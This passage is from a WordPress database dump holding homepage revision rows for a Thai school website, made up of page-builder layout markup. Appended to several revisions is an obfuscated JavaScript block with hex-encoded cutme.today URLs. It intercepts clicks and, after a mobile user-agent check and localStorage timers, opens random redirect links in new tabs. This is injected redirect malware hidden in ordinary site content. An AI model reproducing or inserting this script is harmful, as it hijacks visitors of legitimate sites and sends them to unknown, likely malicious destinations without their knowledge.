_0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 10:45:13','2024-07-27 03:45:13','',14,'http://pakhaeng.ssk.in.th/?p=45',0,'revision','',0),
(46,1,'2024-07-27 10:45:21','2024-07-27 03:45:21','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_f0d3cd-f6\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_f0d3cd-f6\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\"} /--></div>\n<!-- /wp:kadence/advancedbtn -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 10:45:21','2024-07-27 03:45:21','',14,'http://pakhaeng.ssk.in.th/?p=46',0,'revision','',0),
(48,1,'2024-07-27 10:45:57','2024-07-27 03:45:57','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery 